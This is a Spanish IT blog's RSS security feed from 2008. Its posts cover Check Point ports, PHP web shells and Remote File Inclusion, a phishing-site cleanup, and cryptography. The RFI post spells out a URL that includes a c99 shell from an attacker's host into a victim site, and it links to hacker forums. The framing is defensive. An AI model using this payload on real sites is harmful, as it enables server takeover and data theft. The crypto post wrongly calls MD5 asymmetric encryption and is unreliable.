<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Telepieza´s Weblog &#187; Seguridad</title>
	<atom:link href="http://www.telepieza.com/wordpress/category/informatica/seguridad/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.telepieza.com/wordpress</link>
	<description></description>
	<lastBuildDate>Thu, 09 Feb 2012 21:59:26 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Conexión Remota con un firewall Check Point</title>
		<link>http://www.telepieza.com/wordpress/2008/08/22/conexion-remota-con-un-firewall-check-point/</link>
		<comments>http://www.telepieza.com/wordpress/2008/08/22/conexion-remota-con-un-firewall-check-point/#comments</comments>
		<pubDate>Thu, 21 Aug 2008 23:10:23 +0000</pubDate>
		<dc:creator>Telepieza</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Comunicaciones]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.telepieza.com/wordpress/2008/08/22/conexion-remota-con-un-firewall-check-point/</guid>
		<description><![CDATA[Escribo esté post,  porque tengo una memoria de pez (3 Segundos), y  muchas veces no me acuerdo de los dichosos puertos por defecto,  para poder conectar desde el exterior a una máquina en red,  que tiene enfrente a un firewall Check Point (Internet Security Solutions). Existen diferentes formas de conectar a un firewall Check Point [...]]]></description>
			<content:encoded><![CDATA[<p>
<a href="http://www.telepieza.com/wordpress/wp-content/gallery/imagenes/checkpoint.gif" title="" class="thickbox" rel="singlepic397" >
	<img class="ngg-singlepic" src="http://www.telepieza.com/wordpress/wp-content/gallery/cache/397__150x135_checkpoint.gif" alt="checkpoint.gif" title="checkpoint.gif" />
</a>
 Escribo esté post,  porque tengo una memoria de pez (3 Segundos), y  muchas veces no me acuerdo de los dichosos puertos por defecto,  para poder conectar desde el exterior a una máquina en red,  que tiene enfrente a un firewall Check Point (Internet Security Solutions).</p>
<p>Existen diferentes formas de conectar a un firewall Check Point , una de ellas es por VPN y otra por Cliente autentificado.</p>
<p>El que me interesa es el de Cliente autentificado y los puertos son :</p>
<ul>
<li>A nivel de DOS, vía telnet el puerto es el 259. Un ejemplo para activar en Windows es :  telnet 193.142.120.130 259</li>
<li>A nivel de HTTP, vía Explorer el puerto es el 900. Un Ejemplo es : http://193.142.120.130:900</li>
</ul>
<p>Cuando tocamos dichos puertos al Firewall nos abre una ventana de color verde (Muy fea), que nos pide Usuario y contraseña.Una vez autentificado nos abre una puerta (IP), vía NAT para poder llegar a una máquina en concreto según la configuración de las reglas del firewall Check Point.</p>
<p>Un Saludo de Telepieza.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.telepieza.com%2Fwordpress%2F2008%2F08%2F22%2Fconexion-remota-con-un-firewall-check-point%2F&amp;title=Conexi%C3%B3n%20Remota%20con%20un%20firewall%20Check%20Point" id="wpa2a_2"><img src="http://www.telepieza.com/wordpress/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.telepieza.com/wordpress/2008/08/22/conexion-remota-con-un-firewall-check-point/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Los informáticos tenemos que estar informados sobre las técnicas de los hacker (1ª Parte)</title>
		<link>http://www.telepieza.com/wordpress/2008/06/08/los-informaticos-tenemos-que-estar-informados-sobre-las-tecnicas-de-los-hacker-1a-parte/</link>
		<comments>http://www.telepieza.com/wordpress/2008/06/08/los-informaticos-tenemos-que-estar-informados-sobre-las-tecnicas-de-los-hacker-1a-parte/#comments</comments>
		<pubDate>Sat, 07 Jun 2008 23:10:32 +0000</pubDate>
		<dc:creator>Telepieza</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[dispositivos]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[problemas]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.telepieza.com/wordpress/2008/06/08/los-informaticos-tenemos-que-estar-informados-sobre-las-tecnicas-de-los-hacker-1%c2%aa-parte/</guid>
		<description><![CDATA[Muchas veces el desconocimiento de los informáticos sobre las herramientas utilizadas de  los hacker para entrar en nuestros ordenadores, nos hacen más vulnerables, aquí tenemos el logo del popular programa realizado en phpshell llamado r57shell.php o r57.txt o r57.php Para solucionar dicha laguna iré explicando una serie de programas cogidos en un ordenador hackeado y [...]]]></description>
			<content:encoded><![CDATA[<p>
<a href="http://www.telepieza.com/wordpress/wp-content/gallery/hacker/r57_00.gif" title="" class="thickbox" rel="singlepic221" >
	<img class="ngg-singlepic" src="http://www.telepieza.com/wordpress/wp-content/gallery/cache/221__165x57_r57_00.gif" alt="r57_00.gif" title="r57_00.gif" />
</a>
Muchas veces el desconocimiento de los informáticos sobre las herramientas utilizadas de  los hacker para entrar en nuestros ordenadores, nos hacen más vulnerables, aquí tenemos el logo del popular programa realizado en phpshell llamado r57shell.php o r57.txt o r57.php</p>
<p>Para solucionar dicha laguna iré explicando una serie de programas cogidos en un ordenador hackeado y a la vez con sus herramientas dejadas en el sistema por cerrar el firewall una vez dentro del servidor linux.</p>
<p>
<a href="http://www.telepieza.com/wordpress/wp-content/gallery/hacker/c99_00.gif" title="" class="thickbox" rel="singlepic220" >
	<img class="ngg-singlepic" src="http://www.telepieza.com/wordpress/wp-content/gallery/cache/220__165x60_c99_00.gif" alt="c99_00.gif" title="c99_00.gif" />
</a>
 Son muchos los programas a exponer, pero vamos a empezar por dos programas PHPSHELL muy extendidos y son utilizados muy habitualmente por ellos (c99.txt o c99.php y el r57.txt o r57.php). La imagen corresponde al logo del c99.php.</p>
<p>Voy a ejecutar los programas en entorno Windows, pero lo suyo es en Linux, están más pensados en buscar y llevarse la información de vulnerabilidades de servidores con php , por ser dichos programas realizados en lenguaje PHP.</p>
<p>Dichos programas están catalogados en la técnica RFI (Remote File Inclusion) en español (Inclusión de Archivo remoto), se aprovecha de una vulnerabilidad en la programación de páginas web y que tengan instalado el modulo PHP, podemos insertar archivos añadiendo parámetros por la url del navegador. Si la instalación del php.ini está mal configurado, podemos hacer ejecutar nuestros archivos (c99.txt o r57.txt) en el servidor de la website o víctima.</p>
<p>Con un ejemplo se verá más claro:</p>
<p><u><font color="#000080"><strong>http://</strong><strong>www.victima.com/index.php?page=http://www.tuweb.com/c99.txt</strong></font></u> en dicho ejemplo renombramos  después a c99.php y ejecutar o <strong><u><font color="#000080">http://</font></u></strong><u><font color="#000080"><strong>www.victima.com/index.php?page=http://www.tuweb.com/c99.php?</strong></font></u> y ejecutas de forma automática.</p>
<p>Al insertar y ejecutar el programa desde nuestro servidor, ellos nos pueden ver todos nuestras carpetas de nuestra página web y analizar los tipos de ficheros y sus autorizaciones de lectura y escritura.</p>
<p><span id="more-201"></span>Si algunos de nuestros ficheros son de escritura, los agujeros más gordos a nivel de seguridad son :</p>
<ul class="unIndentedList">
<li>Nuestro index.html o index.php lo pueden alterar a su antojo.</li>
<li>Redireccionar nuestra web cambiando el fichero .haccess</li>
<li>Cambiar los datos de tu robots.txt.</li>
<li>Añadir programas malignos para su ejecución en carpetas de escritura.</li>
<li>Cambiar fotos, páginas y demás ficheros por otros.</li>
</ul>
<p>Pero lo más grave aún no ha llegado, al poder entrar en tu sistema pueden visualizar los datos de los ficheros config.php o config.php.inc, dichos ficheros tienen la configuración del nombre, usuario y clave de acceso a la base de datos de nuestra aplicación.</p>
<p>Con dicha información y el programa del c99.php o r57.php se puede extraer todos los datos de la base de datos y llevarla a otro ordenador sin dejar rastro en el servidor, de esa forma el webmaster del Website no se percatará de la extración de datos y hackeo de su servidor.</p>
<p>Pero aún puede ser más grave, si dichas claves de la base de datos es igual a las claves de acceso a nuestro sistema o es un usuario de sistema con poder a Shell (root), a partir de aquí el dominio es total para nuestros hackers.</p>
<p><font color="#000080">CONCLUSION Y SOLUCIONES:</font></p>
<ul class="unIndentedList">
<li>Ten los menos usuarios con Shell en tu sistema creados, como máximo dos uno el root (Linux) o Administrador (Windows) y otro de seguridad por si tienes problemas graves de entrada con los del sistema.</li>
<li>Las contraseñas de dichos usuarios nunca tienen que ser colocadas en otros usuarios o repetidas en otros procesos como la Base de Datos MySql.</li>
<li>Los usuarios de entrada a procesos de base de datos no pueden existir como usuarios de sistema.</li>
<li>Limita las autorizaciones de los usuarios de tu base de datos a la mínima expresión para que no sean extraídos los datos de tu sistema de forma fácil si ellos consiguen la información por el fichero config.php</li>
<li>Si tienes sistema operativo Windows, algunos anti-virus detectan como virus dichos programas, pero no es una garantía de seguridad.</li>
<li>Si tienes sistema operativo Linux te aconsejo mirar el log del cron del usuario que arranca el apache. Los usuarios pueden ser apache, nobody o wwwrun. Ejecuta el comando : # <font color="#ff0000">crontab nobody -l</font> o # <font color="#ff0000">crontab apache -l</font> , si por casualidad te aparece algo parecido a : * * * * * * /var/tmp/nombreprograma es por tener un troyano y eliminalo de forma urgente, te han hackeado y van a por tí.</li>
</ul>
<p>Pero no se me olvida lo más importante y es parametrizar bien tú php.ini y la solución para no activar dichos programas es indicar en la directiva &#8220;safe_mode = On&#8221;. en el fichero php.ini</p>
<p>El programa c99.php es muy extenso y tiene muchas funcionalidades, es cómo un pequeño programa phpMyAdmin pero con más funcionalidades aún.</p>
<p>Aquí tenemos una imagen del programa a nivel de cabecera, y podéis intuir las posibilidades tan grandes de información de dicho programa.</p>

<a href="http://www.telepieza.com/wordpress/wp-content/gallery/hacker/c99_02.gif" title="" class="thickbox" rel="singlepic218" >
	<img class="ngg-singlepic" src="http://www.telepieza.com/wordpress/wp-content/gallery/cache/218__450x130_c99_02.gif" alt="c99_02.gif" title="c99_02.gif" />
</a>

<p>Para ver bien las imágenes picar encima de ella.</p>
<p>El programa en la cabecera ya intuimos todo su potencial y es :</p>
<ul>
<li>Información del Apache, S.O., SSL y PHP</li>
<li>Información sobre la directiva safe-mode</li>
<li>Los directorios del Apache son de Lectura, Escritura y Ejecución</li>
<li>Capacidad del Disco para meter ellos sus programas</li>
<li>Todos los Driver (Discos, Disketes, CD y demás dispositivos)</li>
<li>Y un menú del todo sugerente (Ftp, Tools, Seguridad, Procesos, Sql, E-Mail, Directorios y demás herramientas)</li>
</ul>
<p>Cada vez que picas en alguna opción del menú abajo te sale una consola con la información buscada y unos campos para introducir la información a extraer o consultar por el hacker.</p>

<a href="http://www.telepieza.com/wordpress/wp-content/gallery/hacker/c99_01.gif" title="" class="thickbox" rel="singlepic217" >
	<img class="ngg-singlepic" src="http://www.telepieza.com/wordpress/wp-content/gallery/cache/217__450x396_c99_01.gif" alt="c99_01.gif" title="c99_01.gif" />
</a>

<hr />
<p>Para mí el más dañino es el c99.php, pero el más sorprendente a nivel visual es el r57.txt por presentarse todo su potencial al arranque del programa, ves los datos a solicitar del FTP, E-MAIL y SQL en un sola ojeada. Los que saben de informática y son administradores se quedan impresionados por la foto visual del programa.</p>
<p>Para ver mejor la foto picar encima de la imagen, las he dividido en tres partes por no coger en el visualizador de la galería.</p>
<p>Datos que introduce el hacker para extraer o enviar información vía FTP</p>
<hr />

<a href="http://www.telepieza.com/wordpress/wp-content/gallery/hacker/r57_01.gif" title="" class="thickbox" rel="singlepic222" >
	<img class="ngg-singlepic" src="http://www.telepieza.com/wordpress/wp-content/gallery/cache/222__450x120_r57_01.gif" alt="r57_01.gif" title="r57_01.gif" />
</a>

<hr />
<p>Datos a introducir el hacker para extraer o enviar información vía E-MAIL</p>
<hr />

<a href="http://www.telepieza.com/wordpress/wp-content/gallery/hacker/r57_02.gif" title="" class="thickbox" rel="singlepic223" >
	<img class="ngg-singlepic" src="http://www.telepieza.com/wordpress/wp-content/gallery/cache/223__450x120_r57_02.gif" alt="r57_02.gif" title="r57_02.gif" />
</a>

<hr />
<p>Datos a introducir el hacker para extraer o consultar datos de nuestra Base de Datos, las bases de datos son mysql, mssql, postgresql.</p>
<hr />

<a href="http://www.telepieza.com/wordpress/wp-content/gallery/hacker/r57_03.gif" title="" class="thickbox" rel="singlepic224" >
	<img class="ngg-singlepic" src="http://www.telepieza.com/wordpress/wp-content/gallery/cache/224__450x120_r57_03.gif" alt="r57_03.gif" title="r57_03.gif" />
</a>

<p><font color="#000080"><u><strong>Nota de Telepieza</strong></u></font></p>
<p>Pero si quieres saber más sobre dicha técnica es mejor ir a los foros de los hacker y algunos de sus post son :</p>
<ul>
<li>Hoy toca explicar la técnica RFI (<a href="http://www.wf-zone.us/showthread.php?t=41416" target="_blank" title="Tecnicas RFI">www.wf-zone.us/showthread.php</a>)</li>
<li>Video Tutorial de la técnica RFI (<a href="http://hackerarray.mforos.com/758793/6980276-video-tutorial-rfi-r57-deface-por-socket-0x03/" target="_blank" title="Video">Video de Hackerarray.mforos.com</a>)</li>
<li>Gente discutiendo la técnica RFI (<a href="http://foro.el-hacker.com/index.php?action=profile;u=152900;sa=showPosts" target="_blank" title="Gente en foro RFI">Foro de Discusión RFI</a>)</li>
</ul>
<p>&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;. SALUDOS DE TELEPIEZA &#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;.</p>
<hr />
<script type="text/javascript"><!--
google_ad_client = "pub-9142530214884641";
google_ad_slot = "9641810708";
google_ad_width = 468;
google_ad_height = 60;
//--></script><br />
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<hr />
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.telepieza.com%2Fwordpress%2F2008%2F06%2F08%2Flos-informaticos-tenemos-que-estar-informados-sobre-las-tecnicas-de-los-hacker-1a-parte%2F&amp;title=Los%20inform%C3%A1ticos%20tenemos%20que%20estar%20informados%20sobre%20las%20t%C3%A9cnicas%20de%20los%20hacker%20%281%C2%AA%20Parte%29" id="wpa2a_4"><img src="http://www.telepieza.com/wordpress/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.telepieza.com/wordpress/2008/06/08/los-informaticos-tenemos-que-estar-informados-sobre-las-tecnicas-de-los-hacker-1a-parte/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cómo han hackeado una web con el weblog Serendipity para realizar Phishing.</title>
		<link>http://www.telepieza.com/wordpress/2008/06/01/como-han-hackeado-una-web-con-el-weblog-serendipity-para-realizar-phishing/</link>
		<comments>http://www.telepieza.com/wordpress/2008/06/01/como-han-hackeado-una-web-con-el-weblog-serendipity-para-realizar-phishing/#comments</comments>
		<pubDate>Sat, 31 May 2008 23:10:04 +0000</pubDate>
		<dc:creator>Telepieza</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[linux]]></category>

		<guid isPermaLink="false">http://www.telepieza.com/wordpress/2008/06/01/como-han-hackeado-una-web-con-el-weblog-serendipity-para-realizar-phishing/</guid>
		<description><![CDATA[Un amigo mío ha recibido un e-mail por vía de su proveedor ISP indicando de su dominio o website está pidiendo datos confidenciales de los clientes de un banco americano. Mi amigo está haciendo phishing en su website. Los correos electrónicos enviados tanto por el ISP pidiendo ser cerrado el sitio de acceso como el [...]]]></description>
			<content:encoded><![CDATA[<p>
<a href="http://www.telepieza.com/wordpress/wp-content/gallery/imagenes/serendipity.jpg" title="" class="thickbox" rel="singlepic211" >
	<img class="ngg-singlepic" src="http://www.telepieza.com/wordpress/wp-content/gallery/cache/211__175x128_serendipity.jpg" alt="serendipity.jpg" title="serendipity.jpg" />
</a>
 Un amigo mío ha recibido un e-mail por vía de su proveedor ISP indicando de su dominio o website está pidiendo datos confidenciales de los clientes de un banco americano. <font color="#000080"><strong>Mi amigo está haciendo phishing en su website.</strong></font></p>
<p>Los correos electrónicos enviados tanto por el ISP pidiendo ser cerrado el sitio de acceso como el e-mail del propio banco son confidenciales, pero puedo extraer parte del documento cambiando alguna cosilla del e-mail y es :</p>
<hr />
<p>We have detected a website hosted on your network that purports to be a Bank XXXXXXX website. We confirmed that this webpage is NOT authorized by Bank XXXXXXX and appears to be an unauthorized attempt to obtain our customers&#8217; confidential information. Please send us any server logs or server side scripts that are associated with this fraudulent site. We request that you please assist us in shutting down the website:</p>
<p>URL = http://diminio.com/weblog/template/Boa/data/s.update/u.security/index.html</p>
<p>IP Address &#8211; 192.168.1.100</p>
<p>Please forward this message with your response, directly to anti-phishing@bancoenvioemail.com</p>
<p>While the unauthorized site is no longer a threat to our customers after your assistance with shutting it down, we also suggest that you replace your standard &#8216;shut down&#8217; page with a redirect to our Bank XXXXXXXX</p>
<p>Page using the attached redirect code. By doing this, many ISPs have joined us in educating the public about Phishing and working toward combating the Phishing problem on the internet.</p>
<p>&lt;html&gt; &lt;head&gt;<br />
&lt;meta http-equiv=&#8221;REFRESH&#8221; content=&#8221;0;<br />
URL=https://www.bankXXXXXXXX.com/privacy/Control.XXXXX?body=XXXXXX&#8221;&gt;<br />
&lt;/head&gt; &lt;body&gt; &lt;/body&gt; &lt;/html&gt;</p>
<p>If you are unable to replace your shut down page with our redirect, we thank you in advance for taking action to shut down the unauthorized Bank XXXXXXXXX site.</p>
<hr />
<p>Cómo mi amigo no se dedica a realizar phishing, me pidío ayuda y empece a indagar cómo le habían hackeado su web una pandilla de chorizos. Si investigas cómo actúan puedes saber más del mundo del hacker y de los phishing.</p>
<p>Según la indicación del e-mail del banco se han colocado en su blog y en la zona de template. La pregunta obligada es : ¿Qué distribución tienes de Weblog? La respuesta es : <a href="http://www.s9y.org/">Serendipity</a> y la siguiente pregunta ¿Qué sistema operativo utiliza? y la respuesta es : Linux distribución Red Hat.</p>
<p><span id="more-191"></span></p>
<p>El blog Serendipity es una distribución Open Source, cualquier inmortal con conocimientos de informática conoce su estructura de carpetas, la composición de las tablas de la Base de Datos y su vulnerabilidad en las carpetas temporales por ser de escritura y lectura como la carpeta template o template_c para grabar las páginas cache del blog.</p>
<p><font color="#ff0000">La primera acción es</font> colocar permisos de sólo lectura a dichas carpetas, y claro deja de funcionar el blog por falta de permisos.</p>
<p><font color="#ff0000">La segunda acción es</font> borrar la página web colocada por esos descerebrados y buscar más páginas como esas. Los hacker habian inundado de dicha páginas otros directorios escondidos dependientes de la carpeta raiz template o template_c.</p>
<p><font color="#ff0000">La tercera acción es</font> ir a buscar en la página web de <a href="http://www.s9y.org/">Serendipity</a> una nueva versión para ver si ha solucionado el agujero de seguridad y nos damos cuenta la inexistencia de dichas relises.</p>
<p><font color="#ff0000">La cuarta acción es</font> salvar la información de la Base de Datos y borrar con un <font color="#ff0000">rm -rf weblog</font> todo el blog y todos sus directorios para cerrar el sitio por ser inseguro y de facíl acceso por los chorizos.</p>
<p>Cómo diria mi amigo &#8220;Matado el perro se acabo la rabia&#8221;.</p>
<p>Al ser un blog con copias de seguridad de Base de Datos todos los días, el sitio se volvera abrir en breve con otro tipo de distribución Open Source, la de Serendipity es muy mala para los blogueros y muy buena para los hacker.</p>
<p>Una vez dentro los hacker y localizado la estructura de las carpetas del sitio por no instalar bien el producto (Linux y Serendipity) , la única solución es eliminar y cerrar el blog, para volverlo a montar de nuevo con todas las garantias de seguridad. Eso significa formater el servidor y volver a empezar de nuevo instalando todos los productos con la maxima seguridad a nivel de permisos para no dar facilidades a los hacker.</p>
<p><font color="#000080">¿Cómo Funcionan los hacker a nivel de Phishing en un sitio hackeado?</font></p>
<p>Ante todo tengo son muy listos, pero su forma de actuar es :</p>
<ul>
<li>
<div>Buscan un servidor con agujeros de seguridad tanto en el linux , apache o php.</div>
</li>
<li>
<div>Una vez localizado a la victima (Website), intentan entrar por el puerto 80 y analizar las carpetas temporales de escritura y lectura para inyectar sus páginas index.html.</div>
</li>
<li>
<div>Esperan unos días , semanas o meses y cuando ya están seguros de no ser pillados, empiezan a enviar e-mail a todo el mundo con la dirección del banco pero realmente es la dirección de la página web colocada en tú ordenador.</div>
</li>
<li>
<div>Si algún infeliz teclea sus datos bancarios en el formulario, son enviados a los hacker dicho informe, pero el que queda constancia de hacer phishing es la página web hackeada.</div>
</li>
<li>
<div>Los hacker de esa forma consiguen dos cosas, la primera no ser localizados y la segunda utilizar las líneas de comunicaciones de dichos website.</div>
</li>
</ul>
<p><font color="#000080">NOTA DE TELEPIEZA</font></p>
<p>Recomiendo a todo el mundo si instalan productos Open Source de colocar en todas las carpetas una página index.html realizado por vosotros, de esa forma es imposible de detectar la estructura de los directorios de vuestro WebSite.</p>
<p>Si trabajáis con PHP mirar la directiva &#8220;safe_mode = on&#8221; , <strong>se aconseja estar en on y no en off</strong>, algunas distribuciones de linux viene por defecto a off , del fichero de configuración php.ini del php</p>
<hr />
<script type="text/javascript"><!--
google_ad_client = "pub-9142530214884641";
google_ad_slot = "9641810708";
google_ad_width = 468;
google_ad_height = 60;
//--></script><br />
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<hr />
<p>Saludos de Telepieza.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.telepieza.com%2Fwordpress%2F2008%2F06%2F01%2Fcomo-han-hackeado-una-web-con-el-weblog-serendipity-para-realizar-phishing%2F&amp;title=C%C3%B3mo%20han%20hackeado%20una%20web%20con%20el%20weblog%20Serendipity%20para%20realizar%20Phishing." id="wpa2a_6"><img src="http://www.telepieza.com/wordpress/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.telepieza.com/wordpress/2008/06/01/como-han-hackeado-una-web-con-el-weblog-serendipity-para-realizar-phishing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Los cuatro algoritmos de la criptografía (DES, IDEA, RSA y Hash)</title>
		<link>http://www.telepieza.com/wordpress/2008/03/12/los-cuatro-algoritmos-de-la-criptografia-des-idea-rsa-y-hash/</link>
		<comments>http://www.telepieza.com/wordpress/2008/03/12/los-cuatro-algoritmos-de-la-criptografia-des-idea-rsa-y-hash/#comments</comments>
		<pubDate>Wed, 12 Mar 2008 13:13:40 +0000</pubDate>
		<dc:creator>Telepieza</dc:creator>
				<category><![CDATA[Seguridad]]></category>

		<guid isPermaLink="false">http://www.telepieza.com/wordpress/2008/03/12/los-cuatro-algoritmos-de-la-criptografia-des-idea-rsa-y-hash/</guid>
		<description><![CDATA[ La criptografía es el arte de crear criptogramas, es decir, se codifican los mensajes de forma que sólo el emisor y el receptor puedan entenderlos.   Vamos a explicar de forma general, cuatro algoritmos de la criptografía (DES, IDEA, RSA y MD5.) son secuencias parcialmente complejas de operaciones que sirven para codificar y decodificar un texto o una [...]]]></description>
			<content:encoded><![CDATA[<p>
<a href="http://www.telepieza.com/wordpress/wp-content/gallery/imagenes/algoritmos.jpg" title="" class="thickbox" rel="singlepic103" >
	<img class="ngg-singlepic" src="http://www.telepieza.com/wordpress/wp-content/gallery/cache/103__100x167_algoritmos.jpg" alt="algoritmos.jpg" title="algoritmos.jpg" />
</a>
 La criptografía es el arte de crear criptogramas, es decir, se codifican los mensajes de forma que sólo el emisor y el receptor puedan entenderlos. </p>
<p> Vamos a explicar de forma general, cuatro algoritmos de la criptografía (DES, IDEA, RSA y MD5.) son secuencias parcialmente complejas de operaciones que sirven para codificar y decodificar un texto o una cadena binaria.</p>
<p> Dichos algoritmos de entrada reciben una clave que representa el secreto en sí e influye en el cálculo de los datos codificados. Para poder descodificar dichos mensajes necesitamos la clave utilizada anteriormente.</p>
<p> Los algoritmos de codificación como el DES (Data Encryption Standars) con 56 bits el espacio para claves es de (7 *10<sup>16)  ,</sup> en IDEA (International Data Encryption Algorithmus) con 128 bits es de (3,4 * 10<sup>38).</sup></p>
<p>  Los algoritmos (DES e IDEA) son simétricos, eso significa que tanto el codificador y el decodificador utilizan la misma clave. Dicha técnica no es aconsejable para el mundo de internet.</p>
<p> Si codificamos un texto en un ordenador con dichos algoritmos y lo enviamos por internet a otro ordenador, para que lo pueda descodificar, también tenemos que enviar la clave por la red y eso no es nada aconsejable. Para poder descodificar dichos mensajes el envío de la clave tiene que ser por medios tradicionales, por ejemplo correo ordinario o mensajero.</p>
<p><span id="more-121"></span></p>
<p> Para el mundo de internet existen los algoritmos asimétricos.  En ellos se utiliza para codificar una clave distinta a la que se utiliza para decodificar y aquí ha logrado gran difusión el algoritmo RSA y MD5 es Open Source y deseñado por Ron Rivest uno de los ingenieros de la compañia RSA.</p>
<p>  Por lo tanto, Internet es el terreno ideal para los algoritmos de codificación asimétricos (RSA y MD5), que permiten la codificación y la decodificación con dos claves distintas. En el marco de los sistemas &#8220;Public Key&#8221; se dan dos claves a cada participante: una pública y una privada. La clave pública puede y debe transmitirse hacia el exterior, puesto que se trata de la clave con la que un remitente ha codificado una carta para el destinatario en cuestión: con su clave pública. El destinatario puede obtener esta clave por correo electrónico, por correo normal o por teléfono, o bien, en una base de datos de Internet, en la que se pueden depositar claves públicas libremente.</p>
<p>  Sin embargo, la clave pública no vale para decodificar el mensaje. Esto sólo puede hacerse con la clave privada del destinatario en cuestión, por lo que éste debe guardarla como una pequeña reliquia. La gran ventaja de este método de hecho es que uno sólo tiene que generar algunas claves privadas y públicas para poder recibir correo codificado de cualquier persona en la red, al cual sólo podrá acceder a través de su clave privada.</p>
<p> Existe el algoritmo Hash del modelo MD5 o firma digital. La firma digital es poder acreditar la integridad y la autenticidad de un documento, así como la autoría del remitente. La firma debe ser tan unívoca que no pueda volver a utilizarse para otro documento. Así pues, debe derivarse de alguna manera del documento en sí y de su contenido.</p>
<p>  Las más adecuadas para ello son las funciones &#8220;One-Way Hash&#8221;: que condensan una información en una dirección, pero en otra dirección no permiten deducir la información original.</p>
<p>  El MD5 genera, a partir de un texto de cualquier longitud, una clave de 128 bits que es única para ese texto. Con sólo cambiar un carácter, se obtiene un valor muy distinto en el cálculo del MD5.</p>
<p> Los pasos a seguir en un mensaje con firma digital son:</p>
<ul>
<li>El remitente calcula el valor Hash de su mensaje, lo codifica con su clave privada y lo agrega al mensaje.</li>
<li>A continuación, codifica el mensaje completo con la clave pública del destinatario.</li>
<li>El mensaje viaja a través de Internet.</li>
<li>Llegado al destinatario, éste decodifica el documento con su clave privada.</li>
<li>Decodifica la firma agregada con el valor Hash a través de la clave pública del remitente.</li>
<li>El destinatario calcula el valor Hash del mensaje y lo compara con el valor Hash de la firma decodificada del remitente. Sólo si ambos son idénticos, el mensaje será auténtico y no modificado.</li>
</ul>
<p>En proximas entradas explicaremos cada uno de los algoritmos en profundidad.</p>
</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-9142530214884641";
//468x60, GIF-Viaje
google_ad_slot = "2263745256";
google_ad_width = 468;
google_ad_height = 60;
//--></script><br />
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.telepieza.com%2Fwordpress%2F2008%2F03%2F12%2Flos-cuatro-algoritmos-de-la-criptografia-des-idea-rsa-y-hash%2F&amp;title=Los%20cuatro%20algoritmos%20de%20la%20criptograf%C3%ADa%20%28DES%2C%20IDEA%2C%20RSA%20y%20Hash%29" id="wpa2a_8"><img src="http://www.telepieza.com/wordpress/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.telepieza.com/wordpress/2008/03/12/los-cuatro-algoritmos-de-la-criptografia-des-idea-rsa-y-hash/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Las empresas están lejos de la verdadera seguridad informática</title>
		<link>http://www.telepieza.com/wordpress/2008/01/11/las-empresas-estan-lejos-de-la-verdadera-seguridad-informatica/</link>
		<comments>http://www.telepieza.com/wordpress/2008/01/11/las-empresas-estan-lejos-de-la-verdadera-seguridad-informatica/#comments</comments>
		<pubDate>Fri, 11 Jan 2008 17:12:01 +0000</pubDate>
		<dc:creator>Telepieza</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[hacker]]></category>

		<guid isPermaLink="false">http://www.telepieza.com/wordpress/2008/01/11/las-empresas-estan-lejos-de-la-verdadera-seguridad-informatica/</guid>
		<description><![CDATA[  En la evolución de las tecnologías de la información y las comunicaciones se han cubierto muchas etapas, y actualmente nos encontramos, por diversas circunstancias, en un momento en que la seguridad de la información es una de las mayores preocupaciones de las empresas,  para toda su red asegurando en todo momento el flujo de [...]]]></description>
			<content:encoded><![CDATA[<p>  En la evolución de las tecnologías de la información y las comunicaciones se han cubierto muchas etapas, y actualmente nos encontramos, por diversas circunstancias, en un momento en que la seguridad de la información es una de las mayores preocupaciones de las empresas,  para toda su red asegurando en todo momento el flujo de información entre la compañía, clientes, usuarios, proveedores, acreedores y fabricantes.</p>
<p>  En el afán de seguridad, las empresas invierten muchos millones de euros al año en software, licencias, máquinas y líneas de comunicaciones, para poder dar un servicio y una seguridad en el flujo de información entre nuestras organizaciones sin precedentes en el mundo actual.</p>
